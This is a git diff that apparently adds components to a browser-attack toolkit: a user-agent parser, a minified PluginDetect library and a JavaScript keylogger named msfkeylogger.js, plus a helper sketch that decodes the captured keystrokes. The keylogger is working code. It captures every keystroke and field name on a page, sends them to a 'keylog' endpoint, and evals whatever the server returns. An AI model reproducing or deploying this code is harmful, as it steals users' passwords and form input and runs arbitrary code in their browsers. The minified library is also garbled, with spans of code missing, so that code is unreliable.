+ return agent.split('hpwOS/')[-1].split(';')[0].strip()
+
+
+class NokiaS40(OS):
+ look_for = 'Series40'
+ platform = 'Nokia S40'
+
+ def getVersion(self, agent, word):
+ pass
+
+
+class Symbian(OS):
+ look_for = ['Symbian', 'SymbianOS']
+ platform = 'Symbian'
+
+
+class PlayStation(OS):
+ look_for = ['PlayStation', 'PLAYSTATION']
+ platform = 'PlayStation'
+ version_markers = [" ", ")"]
+
+
+class prefs: # experimental
+ os = dict(
+ Linux=dict(dict(browser=[Firefox, Chrome], dist=[Ubuntu, Android])),
+ BlackBerry=dict(dist=[BlackberryPlaybook]),
+ Macintosh=dict(flavor=[MacOS]),
+ Windows=dict(browser=[MSIE, Firefox]),
+ ChromeOS=dict(browser=[Chrome]),
+ Debian=dict(browser=[Firefox])
+ )
+ dist = dict(
+ Ubuntu=dict(browser=[Firefox]),
+ Android=dict(browser=[Safari]),
+ IPhone=dict(browser=[Safari]),
+ IPad=dict(browser=[Safari]),
+ )
+ flavor = dict(
+ MacOS=dict(browser=[Opera, Chrome, Firefox, MSIE])
+ )
+
+
+detectorshub = DetectorsHub()
+
+
+def detect(agent, fill_none=False):
+ """
+ fill_none: if name/version is not detected respective key is still added to the result with value None
+ """
+ result = dict(platform=dict(name=None, version=None))
+ _suggested_detectors = []
+
+ for info_type in detectorshub:
+ detectors = _suggested_detectors or detectorshub[info_type]
+ for detector in detectors:
+ try:
+ detector.detect(agent, result)
+ except Exception as _err:
+ pass
+
+ if fill_none:
+ attrs_d = {'name': None, 'version': None}
+ for key in ('os', 'browser'):
+ if key not in result:
+ result[key] = attrs_d
+ else:
+ for k, v in attrs_d.items():
+ result[key].setdefault(k, v)
+
+ return result
+
+
+def simple_detect(agent):
+ """
+ -> (os, browser) # tuple of strings
+ """
+ result = detect(agent)
+ os_list = []
+ if 'flavor' in result:
+ os_list.append(result['flavor']['name'])
+ if 'dist' in result:
+ os_list.append(result['dist']['name'])
+ if 'os' in result:
+ os_list.append(result['os']['name'])
+
+ os = os_list and " ".join(os_list) or "Unknown OS"
+ os_version = os_list and (result.get('flavor') and result['flavor'].get('version')) or \
+ (result.get('dist') and result['dist'].get('version')) or (result.get('os') and result['os'].get('version')) or ""
+ browser = 'browser' in result and result['browser'].get('name') or 'Unknown Browser'
+ browser_version = 'browser' in result and result['browser'].get('version') or ""
+ if browser_version:
+ browser = " ".join((browser, browser_version))
+ if os_version:
+ os = " ".join((os, os_version))
+ return os, browser
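
The file added above is the bundled user-agent parser: each `Browser`/`OS`/`Dist`/`Flavor` subclass declares what to look for and how to cut the version out of the agent string, and `detect()`/`simple_detect()` run the registered detectors over it. A minimal usage sketch follows; the UA string and the expected outputs are illustrative, and the import path is omitted because this file's location isn't shown in the hunk above:

```python
# Hedged usage sketch of the parser added above; the UA string is a made-up example.
ua = ("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36")

print(simple_detect(ua))  # expected roughly: ('Windows 7', 'Chrome 41.0.2228.0'), via the win_versions map
print(detect(ua))         # nested dict, roughly {'platform': {...}, 'os': {'name': 'Windows', ...}, 'browser': {...}}
```

The `(os, browser)` tuple returned by `simple_detect()` is presumably what later shows up as `useragent[0]`/`useragent[1]` in the BrowserSniper plugin further down.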
diff --git a/core/javascript/msfkeylogger.js b/core/javascript/msfkeylogger.js
new file mode 100644
index 0000000..5110961
--- /dev/null
+++ b/core/javascript/msfkeylogger.js
@@ -0,0 +1,117 @@
+window.onload = function (){
+ var2 = ",";
+ name = '';
+ function make_xhr(){
+ var xhr;
+ try {
+ xhr = new XMLHttpRequest();
+ } catch(e) {
+ try {
+ xhr = new ActiveXObject("Microsoft.XMLHTTP");
+ } catch(e) {
+ xhr = new ActiveXObject("MSXML2.ServerXMLHTTP");
+ }
+ }
+ if(!xhr) {
+ throw "failed to create XMLHttpRequest";
+ }
+ return xhr;
+ }
+
+ xhr = make_xhr();
+ xhr.onreadystatechange = function() {
+ if(xhr.readyState == 4 && (xhr.status == 200 || xhr.status == 304)) {
+ eval(xhr.responseText);
+ }
+ }
+
+ if (window.addEventListener){
+ //console.log("first");
+ document.addEventListener('keypress', function2, true);
+ document.addEventListener('keydown', function1, true);
+ }
+ else if (window.attachEvent){
+ //console.log("second");
+ document.attachEvent('onkeypress', function2);
+ document.attachEvent('onkeydown', function1);
+ }
+ else {
+ //console.log("third");
+ document.onkeypress = function2;
+ document.onkeydown = function1;
+ }
+}
+
+function function2(e)
+{
+ try
+ {
+ srcname = window.event.srcElement.name;
+ }catch(error)
+ {
+ srcname = e.srcElement ? e.srcElement.name : e.target.name
+ if (srcname == "")
+ {
+ srcname = e.target.name
+ }
+ }
+
+ var3 = (e) ? e.keyCode : e.which;
+ if (var3 == 0)
+ {
+ var3 = e.charCode
+ }
+
+ if (var3 != "d" && var3 != 8 && var3 != 9 && var3 != 13)
+ {
+ andxhr(var3.toString(16), srcname);
+ }
+}
+
+function function1(e)
+{
+ try
+ {
+ srcname = window.event.srcElement.name;
+ }catch(error)
+ {
+ srcname = e.srcElement ? e.srcElement.name : e.target.name
+ if (srcname == "")
+ {
+ srcname = e.target.name
+ }
+ }
+
+ var3 = (e) ? e.keyCode : e.which;
+ if (var3 == 9 || var3 == 8 || var3 == 13)
+ {
+ andxhr(var3.toString(16), srcname);
+ }
+ else if (var3 == 0)
+ {
+
+ text = document.getElementById(id).value;
+ if (text.length != 0)
+ {
+ andxhr(text.toString(16), srcname);
+ }
+ }
+
+}
+function andxhr(key, inputName)
+{
+ if (inputName != name)
+ {
+ name = inputName;
+ var2 = ",";
+ }
+ var2= var2 + key + ",";
+ xhr.open("POST", "keylog", true);
+ xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
+ xhr.send(var2 + '&&' + inputName);
+
+ if (key == 13 || var2.length > 3000)
+ {
+ var2 = ",";
+ }
+}
\ No newline at end of file
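
The keylogger above buffers keys per input field as comma-separated hex codes and re-POSTs the accumulated buffer to the relative `keylog` path as `<codes>&&<field name>` on every stroke. A hedged decoding sketch for that body format; the function name and sample body are assumptions, not part of the patch:

```python
# Hedged sketch: decode the body format produced by andxhr() in msfkeylogger.js above.
def decode_keylog(body):
    codes, _, field = body.partition('&&')                # ',<hex>,<hex>,...' + '&&' + '<input name>'
    keys = [chr(int(h, 16)) for h in codes.split(',') if h]
    return field, ''.join(keys)

# made-up sample: 'h', 'i', then Enter (0x0d) typed into a field named 'username'
print(decode_keylog(",68,69,d,&&username"))               # -> ('username', 'hi\r')
```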
diff --git a/core/javascript/plugindetect.js b/core/javascript/plugindetect.js
new file mode 100644
index 0000000..6f25433
--- /dev/null
+++ b/core/javascript/plugindetect.js
@@ -0,0 +1,76 @@
+/*
+PluginDetect v0.9.0
+www.pinlady.net/PluginDetect/license/
+[ QuickTime Java DevalVR Flash Shockwave WindowsMediaPlayer Silverlight VLC AdobeReader PDFReader RealPlayer IEcomponent ActiveX PDFjs ]
+[ isMinVersion getVersion hasMimeType onDetectionDone ]
+[ AllowActiveX ]
+*/
+
+var PluginDetect={version:"0.9.0",name:"PluginDetect",addPlugin:function(p,q){if(p&&PluginDetect.isString(p)&&q&&PluginDetect.isFunc(q.getVersion)){p=p.replace(/\s/g,"").toLowerCase();PluginDetect.Plugins[p]=q;if(!PluginDetect.isDefined(q.getVersionDone)){q.installed=null;q.version=null;q.version0=null;q.getVersionDone=null;q.pluginName=p;}}},uniqueName:function(){return PluginDetect.name+"998"},openTag:"<",hasOwnPROP:({}).constructor.prototype.hasOwnProperty,hasOwn:function(s,t){var p;try{p=PluginDetect.hasOwnPROP.call(s,t)}catch(q){}return !!p},rgx:{str:/string/i,num:/number/i,fun:/function/i,arr:/array/i},toString:({}).constructor.prototype.toString,isDefined:function(p){return typeof p!="undefined"},isArray:function(p){return PluginDetect.rgx.arr.test(PluginDetect.toString.call(p))},isString:function(p){return PluginDetect.rgx.str.test(PluginDetect.toString.call(p))},isNum:function(p){return PluginDetect.rgx.num.test(PluginDetect.toString.call(p))},isStrNum:function(p){return PluginDetect.isString(p)&&(/\d/).test(p)},isFunc:function(p){return PluginDetect.rgx.fun.test(PluginDetect.toString.call(p))},getNumRegx:/[\d][\d\.\_,\-]*/,splitNumRegx:/[\.\_,\-]/g,getNum:function(q,r){var p=PluginDetect.isStrNum(q)?(PluginDetect.isDefined(r)?new RegExp(r):PluginDetect.getNumRegx).exec(q):null;return p?p[0]:null},compareNums:function(w,u,t){var s,r,q,v=parseInt;if(PluginDetect.isStrNum(w)&&PluginDetect.isStrNum(u)){if(PluginDetect.isDefined(t)&&t.compareNums){return t.compareNums(w,u)}s=w.split(PluginDetect.splitNumRegx);r=u.split(PluginDetect.splitNumRegx);for(q=0;qv(r[q],10)){return 1}if(v(s[q],10)r||!(/\d/).test(s[p])){s[p]="0"}}return s.slice(0,4).join(",")},pd:{getPROP:function(s,q,p){try{if(s){p=s[q]}}catch(r){}return p},findNavPlugin:function(u){if(u.dbug){return u.dbug}var A=null;if(window.navigator){var z={Find:PluginDetect.isString(u.find)?new RegExp(u.find,"i"):u.find,Find2:PluginDetect.isString(u.find2)?new RegExp(u.find2,"i"):u.find2,Avoid:u.avoid?(PluginDetect.isString(u.avoid)?new RegExp(u.avoid,"i"):u.avoid):0,Num:u.num?/\d/:0},s,r,t,y,x,q,p=navigator.mimeTypes,w=navigator.plugins;if(u.mimes&&p){y=PluginDetect.isArray(u.mimes)?[].concat(u.mimes):(PluginDetect.isString(u.mimes)?[u.mimes]:[]);for(s=0;s-1&&p>r&&s[p]!="0"){return q}if(v[p]!=s[p]){if(r==-1){r=p}if(s[p]!="0"){return q}}}return t},AXO:(function(){var q;try{q=new window.ActiveXObject()}catch(p){}return q?null:window.ActiveXObject})(),getAXO:function(p){var r=null;try{r=new PluginDetect.AXO(p)}catch(q){PluginDetect.errObj=q;}if(r){PluginDetect.browser.ActiveXEnabled=!0}return r},browser:{detectPlatform:function(){var r=this,q,p=window.navigator?navigator.platform||"":"";PluginDetect.OS=100;if(p){var s=["Win",1,"Mac",2,"Linux",3,"FreeBSD",4,"iPhone",21.1,"iPod",21.2,"iPad",21.3,"Win.*CE",22.1,"Win.*Mobile",22.2,"Pocket\\s*PC",22.3,"",100];for(q=s.length-2;q>=0;q=q-2){if(s[q]&&new RegExp(s[q],"i").test(p)){PluginDetect.OS=s[q+1];break}}}},detectIE:function(){var 
r=this,u=document,t,q,v=window.navigator?navigator.userAgent||"":"",w,p,y;r.ActiveXFilteringEnabled=!1;r.ActiveXEnabled=!1;try{r.ActiveXFilteringEnabled=!!window.external.msActiveXFilteringEnabled()}catch(s){}p=["Msxml2.XMLHTTP","Msxml2.DOMDocument","Microsoft.XMLDOM","TDCCtl.TDCCtl","Shell.UIHelper","HtmlDlgSafeHelper.HtmlDlgSafeHelper","Scripting.Dictionary"];y=["WMPlayer.OCX","ShockwaveFlash.ShockwaveFlash","AgControl.AgControl"];w=p.concat(y);for(t=0;t=7?u.documentMode:0)||((/^(?:.*?[^a-zA-Z])??(?:MSIE|rv\s*\:)\s*(\d+\.?\d*)/i).test(v)?parseFloat(RegExp.$1,10):7)}},detectNonIE:function(){var p=this,s=window.navigator?navigator:{},r=p.isIE?"":s.userAgent||"",t=s.vendor||"",q=s.product||"";p.isGecko=(/Gecko/i).test(q)&&(/Gecko\s*\/\s*\d/i).test(r);p.verGecko=p.isGecko?PluginDetect.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(r)?RegExp.$1:"0.9"):null;p.isOpera=(/(OPR\s*\/|Opera\s*\/\s*\d.*\s*Version\s*\/|Opera\s*[\/]?)\s*(\d+[\.,\d]*)/i).test(r);p.verOpera=p.isOpera?PluginDetect.formatNum(RegExp.$2):null;p.isChrome=!p.isOpera&&(/(Chrome|CriOS)\s*\/\s*(\d[\d\.]*)/i).test(r);p.verChrome=p.isChrome?PluginDetect.formatNum(RegExp.$2):null;p.isSafari=!p.isOpera&&!p.isChrome&&((/Apple/i).test(t)||!t)&&(/Safari\s*\/\s*(\d[\d\.]*)/i).test(r);p.verSafari=p.isSafari&&(/Version\s*\/\s*(\d[\d\.]*)/i).test(r)?PluginDetect.formatNum(RegExp.$1):null;},init:function(){var p=this;p.detectPlatform();p.detectIE();p.detectNonIE()}},init:{hasRun:0,library:function(){window[PluginDetect.name]=PluginDetect;var q=this,p=document;PluginDetect.win.init();PluginDetect.head=p.getElementsByTagName("head")[0]||p.getElementsByTagName("body")[0]||p.body||null;PluginDetect.browser.init();q.hasRun=1;}},ev:{addEvent:function(r,q,p){if(r&&q&&p){if(r.addEventListener){r.addEventListener(q,p,false)}else{if(r.attachEvent){r.attachEvent("on"+q,p)}else{r["on"+q]=this.concatFn(p,r["on"+q])}}}},removeEvent:function(r,q,p){if(r&&q&&p){if(r.removeEventListener){r.removeEventListener(q,p,false)}else{if(r.detachEvent){r.detachEvent("on"+q,p)}}}},concatFn:function(q,p){return function(){q();if(typeof p=="function"){p()}}},handler:function(t,s,r,q,p){return function(){t(s,r,q,p)}},handlerOnce:function(s,r,q,p){return function(){var u=PluginDetect.uniqueName();if(!s[u]){s[u]=1;s(r,q,p)}}},handlerWait:function(s,u,r,q,p){var t=this;return function(){t.setTimeout(t.handler(u,r,q,p),s)}},setTimeout:function(q,p){if(PluginDetect.win&&PluginDetect.win.unload){return}setTimeout(q,p)},fPush:function(q,p){if(PluginDetect.isArray(p)&&(PluginDetect.isFunc(q)||(PluginDetect.isArray(q)&&q.length>0&&PluginDetect.isFunc(q[0])))){p.push(q)}},call0:function(q){var p=PluginDetect.isArray(q)?q.length:-1;if(p>0&&PluginDetect.isFunc(q[0])){q[0](PluginDetect,p>1?q[1]:0,p>2?q[2]:0,p>3?q[3]:0)}else{if(PluginDetect.isFunc(q)){q(PluginDetect)}}},callArray0:function(p){var q=this,r;if(PluginDetect.isArray(p)){while(p.length){r=p[0];p.splice(0,1);if(PluginDetect.win&&PluginDetect.win.unload&&p!==PluginDetect.win.unloadHndlrs){}else{q.call0(r)}}}},call:function(q){var p=this;p.call0(q);p.ifDetectDoneCallHndlrs()},callArray:function(p){var q=this;q.callArray0(p);q.ifDetectDoneCallHndlrs()},allDoneHndlrs:[],ifDetectDoneCallHndlrs:function(){var r=this,p,q;if(!r.allDoneHndlrs.length){return}if(PluginDetect.win){if(!PluginDetect.win.loaded||PluginDetect.win.loadPrvtHndlrs.length||PluginDetect.win.loadPblcHndlrs.length){return}}if(PluginDetect.Plugins){for(p in 
PluginDetect.Plugins){if(PluginDetect.hasOwn(PluginDetect.Plugins,p)){q=PluginDetect.Plugins[p];if(q&&PluginDetect.isFunc(q.getVersion)){if(q.OTF==3||(q.DoneHndlrs&&q.DoneHndlrs.length)||(q.BIHndlrs&&q.BIHndlrs.length)){return}}}}}r.callArray0(r.allDoneHndlrs);}},isMinVersion:function(v,u,r,q){var s=PluginDetect.pd.findPlugin(v),t,p=-1;if(s.status<0){return s.status}t=s.plugin;u=PluginDetect.formatNum(PluginDetect.isNum(u)?u.toString():(PluginDetect.isStrNum(u)?PluginDetect.getNum(u):"0"));if(t.getVersionDone!=1){t.getVersion(u,r,q);if(t.getVersionDone===null){t.getVersionDone=1}}if(t.installed!==null){p=t.installed<=0.5?t.installed:(t.installed==0.7?1:(t.version===null?0:(PluginDetect.compareNums(t.version,u,t)>=0?1:-0.1)))}return p},getVersion:function(u,r,q){var s=PluginDetect.pd.findPlugin(u),t,p;if(s.status<0){return null}t=s.plugin;if(t.getVersionDone!=1){t.getVersion(null,r,q);if(t.getVersionDone===null){t.getVersionDone=1}}p=(t.version||t.version0);p=p?p.replace(PluginDetect.splitNumRegx,PluginDetect.pd.getVersionDelimiter):p;return p},hasMimeType:function(t){if(t&&window.navigator&&navigator.mimeTypes){var w,v,q,s,p=navigator.mimeTypes,r=PluginDetect.isArray(t)?[].concat(t):(PluginDetect.isString(t)?[t]:[]);s=r.length;for(q=0;q=0){p=(u.L.x==q.x?s.isActiveXObject(u,q.v):PluginDetect.compareNums(t,u.L.v)<=0)?1:-1}}return p},search:function(v){var B=this,w=v.$$,q=0,r;r=v.searchHasRun||B.isDisabled()?1:0;v.searchHasRun=1;if(r){return v.version||null}B.init(v);var F,E,D,s=v.DIGITMAX,t,p,C=99999999,u=[0,0,0,0],G=[0,0,0,0];var A=function(y,PluginDetect){var H=[].concat(u),I;H[y]=PluginDetect;I=B.isActiveXObject(v,H.join(","));if(I){q=1;u[y]=PluginDetect}else{G[y]=PluginDetect}return I};for(F=0;FG[F]&&PluginDetect.compareNums(p,v.Lower[D])>=0&&PluginDetect.compareNums(t,v.Upper[D])<0){G[F]=Math.floor(s[D][F])}}}for(E=0;E<30;E++){if(G[F]-u[F]<=16){for(D=G[F];D>=u[F]+(F?1:0);D--){if(A(F,D)){break}}break}A(F,Math.round((G[F]+u[F])/2))}if(!q){break}G[F]=u[F];}if(q){v.version=B.convert(v,u.join(",")).v}return v.version||null},emptyNode:function(p){try{p.innerHTML=""}catch(q){}},HTML:[],len:0,onUnload:function(r,q){var p,t=q.HTML,s;for(p=0;p'+PluginDetect.openTag+"/object>";for(p=0;p=0){return 0}r.innerHTML=u.tagA+q+u.tagB;if(PluginDetect.pd.getPROP(r.firstChild,"object")){p=1}if(p){u.min=q;t.HTML.push({spanObj:r,span:t.span})}else{u.max=q;r.innerHTML=""}return p},span:function(){return this.spanObj},convert_:function(t,p,q,s){var r=t.convert[p];return r?(PluginDetect.isFunc(r)?PluginDetect.formatNum(r(q.split(PluginDetect.splitNumRegx),s).join(",")):q):r},convert:function(v,r,u){var t=this,q,p,s;r=PluginDetect.formatNum(r);p={v:r,x:-1};if(r){for(q=0;q=0&&(!q||PluginDetect.compareNums(r,u?t.convert_(v,q,v.Upper[q]):v.Upper[q])<0)){p.v=t.convert_(v,q,r,u);p.x=q;break}}}return p},z:0},win:{disable:function(){this.cancel=true},cancel:false,loaded:false,unload:false,hasRun:0,init:function(){var p=this;if(!p.hasRun){p.hasRun=1;if((/complete/i).test(document.readyState||"")){p.loaded=true;}else{PluginDetect.ev.addEvent(window,"load",p.onLoad)}PluginDetect.ev.addEvent(window,"unload",p.onUnload)}},loadPrvtHndlrs:[],loadPblcHndlrs:[],unloadHndlrs:[],onUnload:function(){var p=PluginDetect.win;if(p.unload){return}p.unload=true;PluginDetect.ev.removeEvent(window,"load",p.onLoad);PluginDetect.ev.removeEvent(window,"unload",p.onUnload);PluginDetect.ev.callArray(p.unloadHndlrs)},onLoad:function(){var 
p=PluginDetect.win;if(p.loaded||p.unload||p.cancel){return}p.loaded=true;PluginDetect.ev.callArray(p.loadPrvtHndlrs);PluginDetect.ev.callArray(p.loadPblcHndlrs);}},DOM:{isEnabled:{objectTag:function(){var q=PluginDetect.browser,p=q.isIE?0:1;if(q.ActiveXEnabled){p=1}return !!p},objectTagUsingActiveX:function(){var p=0;if(PluginDetect.browser.ActiveXEnabled){p=1}return !!p},objectProperty:function(p){if(p&&p.tagName&&PluginDetect.browser.isIE){if((/applet/i).test(p.tagName)){return(!this.objectTag()||PluginDetect.isDefined(PluginDetect.pd.getPROP(document.createElement("object"),"object"))?1:0)}return PluginDetect.isDefined(PluginDetect.pd.getPROP(document.createElement(p.tagName),"object"))?1:0}return 0}},HTML:[],div:null,divID:"plugindetect",divWidth:500,getDiv:function(){return this.div||document.getElementById(this.divID)||null},initDiv:function(){var q=this,p;if(!q.div){p=q.getDiv();if(p){q.div=p;}else{q.div=document.createElement("div");q.div.id=q.divID;q.setStyle(q.div,q.getStyle.div());q.insertDivInBody(q.div)}PluginDetect.ev.fPush([q.onUnload,q],PluginDetect.win.unloadHndlrs)}p=0},pluginSize:1,iframeWidth:40,iframeHeight:10,altHTML:" ",emptyNode:function(q){var p=this;if(q&&(/div|span/i).test(q.tagName||"")){if(PluginDetect.browser.isIE){p.setStyle(q,["display","none"])}try{q.innerHTML=""}catch(r){}}},removeNode:function(p){try{if(p&&p.parentNode){p.parentNode.removeChild(p)}}catch(q){}},onUnload:function(u,t){var r,q,s,v,w=t.HTML,p=w.length;if(p){for(q=p-1;q>=0;q--){v=w[q];if(v){w[q]=0;t.emptyNode(v.span());t.removeNode(v.span());v.span=0;v.spanObj=0;v.doc=0;v.objectProperty=0}}}r=t.getDiv();t.emptyNode(r);t.removeNode(r);v=0;s=0;r=0;t.div=0},span:function(){var p=this;if(!p.spanObj){p.spanObj=p.doc.getElementById(p.spanId)}return p.spanObj||null},width:function(){var t=this,s=t.span(),q,r,p=-1;q=s&&PluginDetect.isNum(s.scrollWidth)?s.scrollWidth:p;r=s&&PluginDetect.isNum(s.offsetWidth)?s.offsetWidth:p;s=0;return r>0?r:(q>0?q:Math.max(r,q))},obj:function(){var p=this.span();return p?p.firstChild||null:null},readyState:function(){var p=this;return PluginDetect.browser.isIE&&PluginDetect.isDefined(PluginDetect.pd.getPROP(p.span(),"readyState"))?PluginDetect.pd.getPROP(p.obj(),"readyState"):PluginDetect.UNDEFINED},objectProperty:function(){var r=this,q=r.DOM,p;if(q.isEnabled.objectProperty(r)){p=PluginDetect.pd.getPROP(r.obj(),"object")}return p},onLoadHdlr:function(p,q){q.loaded=1},getTagStatus:function(q,A,E,D,t,H,v){var F=this;if(!q||!q.span()){return -2}var y=q.width(),r=q.obj()?1:0,s=q.readyState(),p=q.objectProperty();if(p){return 1.5}var u=/clsid\s*\:/i,C=E&&u.test(E.outerHTML||"")?E:(D&&u.test(D.outerHTML||"")?D:0),w=E&&!u.test(E.outerHTML||"")?E:(D&&!u.test(D.outerHTML||"")?D:0),z=q&&u.test(q.outerHTML||"")?C:w;if(!A||!A.span()||!z||!z.span()){return -2}var x=z.width(),B=A.width(),G=z.readyState();if(y<0||x<0||B<=F.pluginSize){return 0}if(v&&!q.pi&&PluginDetect.isDefined(p)&&PluginDetect.browser.isIE&&q.tagName==z.tagName&&q.time<=z.time&&y===x&&s===0&&G!==0){q.pi=1}if(x.'+PluginDetect.openTag+"/div>");q=s.getElementById(u)}catch(r){}}p=s.getElementsByTagName("body")[0]||s.body;if(p){p.insertBefore(v,p.firstChild);if(q){p.removeChild(q)}}v=0},iframe:{onLoad:function(p,q){PluginDetect.ev.callArray(p);},insert:function(r,q){var 
s=this,v=PluginDetect.DOM,p,u=document.createElement("iframe"),t;v.setStyle(u,v.getStyle.iframe());u.width=v.iframeWidth;u.height=v.iframeHeight;v.initDiv();p=v.getDiv();p.appendChild(u);try{s.doc(u).open()}catch(w){}u[PluginDetect.uniqueName()]=[];t=PluginDetect.ev.handlerOnce(PluginDetect.isNum(r)&&r>0?PluginDetect.ev.handlerWait(r,s.onLoad,u[PluginDetect.uniqueName()],q):PluginDetect.ev.handler(s.onLoad,u[PluginDetect.uniqueName()],q));PluginDetect.ev.addEvent(u,"load",t);if(!u.onload){u.onload=t}PluginDetect.ev.addEvent(s.win(u),"load",t);return u},addHandler:function(q,p){if(q){PluginDetect.ev.fPush(p,q[PluginDetect.uniqueName()])}},close:function(p){try{this.doc(p).close()}catch(q){}},write:function(p,r){try{this.doc(p).write(r)}catch(q){}},win:function(p){try{return p.contentWindow}catch(q){}return null},doc:function(p){var r;try{r=p.contentWindow.document}catch(q){}try{if(!r){r=p.contentDocument}}catch(q){}return r||null}},insert:function(t,s,u,p,y,w,v){var D=this,F,E,C,B,A;if(!v){D.initDiv();v=D.getDiv()}if(v){if((/div/i).test(v.tagName)){B=v.ownerDocument}if((/iframe/i).test(v.tagName)){B=D.iframe.doc(v)}}if(B&&B.createElement){}else{B=document}if(!PluginDetect.isDefined(p)){p=""}if(PluginDetect.isString(t)&&(/[^\s]/).test(t)){t=t.toLowerCase().replace(/\s/g,"");F=PluginDetect.openTag+t+" ";F+='style="'+D.getStyle.plugin(w)+'" ';var r=1,q=1;for(A=0;A"}else{F+=">";for(A=0;A'}}F+=p+PluginDetect.openTag+"/"+t+">"}}else{t="";F=p}E={spanId:"",spanObj:null,span:D.span,loaded:null,tagName:t,outerHTML:F,DOM:D,time:new Date().getTime(),width:D.width,obj:D.obj,readyState:D.readyState,objectProperty:D.objectProperty,doc:B};if(v&&v.parentNode){if((/iframe/i).test(v.tagName)){D.iframe.addHandler(v,[D.onLoadHdlr,E]);E.loaded=0;E.spanId=PluginDetect.name+"Span"+D.HTML.length;C=''+F+"";D.iframe.write(v,C)}else{if((/div/i).test(v.tagName)){C=B.createElement("span");D.setStyle(C,D.getStyle.span());v.appendChild(C);try{C.innerHTML=F}catch(z){}E.spanObj=C}}}C=0;v=0;D.HTML.push(E);return E}},file:{any:"fileStorageAny999",valid:"fileStorageValid999",save:function(s,t,r){var q=this,p;if(s&&PluginDetect.isDefined(r)){if(!s[q.any]){s[q.any]=[]}if(!s[q.valid]){s[q.valid]=[]}s[q.any].push(r);p=q.split(t,r);if(p){s[q.valid].push(p)}}},getValidLength:function(p){return p&&p[this.valid]?p[this.valid].length:0},getAnyLength:function(p){return p&&p[this.any]?p[this.any].length:0},getValid:function(r,p){var q=this;return r&&r[q.valid]?q.get(r[q.valid],p):null},getAny:function(r,p){var q=this;return r&&r[q.any]?q.get(r[q.any],p):null},get:function(s,p){var r=s.length-1,q=PluginDetect.isNum(p)?p:r;return(q<0||q>r)?null:s[q]},split:function(t,q){var s=null,p,r;t=t?t.replace(".","\\."):"";r=new RegExp("^(.*[^\\/])("+t+"\\s*)$");if(PluginDetect.isString(q)&&r.test(q)){p=(RegExp.$1).split("/");s={name:p[p.length-1],ext:RegExp.$2,full:q};p[p.length-1]="";s.path=p.join("/")}return s}},Plugins:{}};PluginDetect.init.library();var i={setPluginStatus:function(q,p,s){var r=this;r.version=p?PluginDetect.formatNum(p,3):null;r.installed=r.version?1:(s?(s>0?0.7:-0.1):(q?0:-1));r.getVersionDone=r.installed==0.7||r.installed==-0.1||r.nav.done===0?0:1;},getVersion:function(s,t){var 
u=this,p=null,r=0,q;t=PluginDetect.browser.isIE?0:t;if((!r||PluginDetect.dbug)&&u.nav.query(t).installed){r=1}if((!p||PluginDetect.dbug)&&u.nav.query(t).version){p=u.nav.version}q=!p?u.codebase.isMin(s):0;if(q){u.setPluginStatus(0,0,q);return}if(!p||PluginDetect.dbug){q=u.codebase.search();if(q){r=1;p=q}}if((!r||PluginDetect.dbug)&&u.axo.query().installed){r=1}if((!p||PluginDetect.dbug)&&u.axo.query().version){p=u.axo.version}u.setPluginStatus(r,p)},nav:{done:null,installed:0,version:null,result:[0,0],mimeType:["video/quicktime","application/x-quicktimeplayer","image/x-macpaint","image/x-quicktime","application/x-rtsp","application/x-sdp","application/sdp","audio/vnd.qcelp","video/sd-video","audio/mpeg","video/mp4","video/3gpp2","application/x-mpeg","audio/x-m4b","audio/x-aac","video/flc"],find:"QuickTime.*Plug-?in",find2:"QuickTime.*Plug-?in",find3filename:"QuickTime|QT",avoid:"Totem|VLC|RealPlayer|Helix|MPlayer|Windows\\s*Media\\s*Player",plugins:"QuickTime Plug-in",detect:function(s){var t=this,r,q,p={installed:0,version:null,plugin:null};r=PluginDetect.pd.findNavPlugin({find:t.find,find2:s?0:t.find2,avoid:s?0:t.avoid,mimes:t.mimeType,plugins:t.plugins});if(r){p.plugin=r;p.installed=1;q=new RegExp(t.find,"i");if(r.name&&q.test(r.name+"")){p.version=PluginDetect.getNum(r.name+"")}}return p},query:function(r){var q=this,t,s;r=r?1:0;if(q.done===null){if(PluginDetect.hasMimeType(q.mimeType)){s=q.detect(1);if(s.installed){t=q.detect(0);q.result=[t,t.installed?t:s]}var x=q.result[0],v=q.result[1],w=new RegExp(q.avoid,"i"),u=new RegExp(q.find3filename,"i"),p;x=x?x.plugin:0;v=v?v.plugin:0;if(!x&&v&&v.name&&(!v.description||(/^[\s]*$/).test(v.description+""))&&!w.test(v.name+"")){p=(v.filename||"")+"";if((/^.*[\\\/]([^\\\/]*)$/).test(p)){p=RegExp.$1;}if(p&&u.test(p)&&!w.test(p)){q.result[0]=q.result[1]}}}q.done=q.result[0]===q.result[1]?1:0;}if(q.result[r]){q.installed=q.result[r].installed;q.version=q.result[r].version}return q}},codebase:{classID:"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B",isMin:function(r){var s=this,q,p=0;s.$$=i;if(PluginDetect.isStrNum(r)){q=r.split(PluginDetect.splitNumRegx);if(q.length>3&&parseInt(q[3],10)>0){q[3]="9999"}r=q.join(",");p=PluginDetect.codebase.isMin(s,r)}return p},search:function(){this.$$=i;return PluginDetect.codebase.search(this)},DIGITMAX:[[12,11,11],[7,60],[7,11,11],0,[7,11,11]],DIGITMIN:[5,0,0,0],Upper:["999","7,60","7,50","7,6","7,5"],Lower:["7,60","7,50","7,6","7,5","0"],convert:[1,function(r,q){return q?[r[0],r[1]+r[2],r[3],"0"]:[r[0],r[1].charAt(0),r[1].charAt(1),r[2]]},1,0,1]},axo:{hasRun:0,installed:0,version:null,progID:["QuickTimeCheckObject.QuickTimeCheck","QuickTimeCheckObject.QuickTimeCheck.1"],progID0:"QuickTime.QuickTime",query:function(){var r=this,t,p,q,s=r.hasRun||!PluginDetect.browser.ActiveXEnabled;r.hasRun=1;if(s){return 
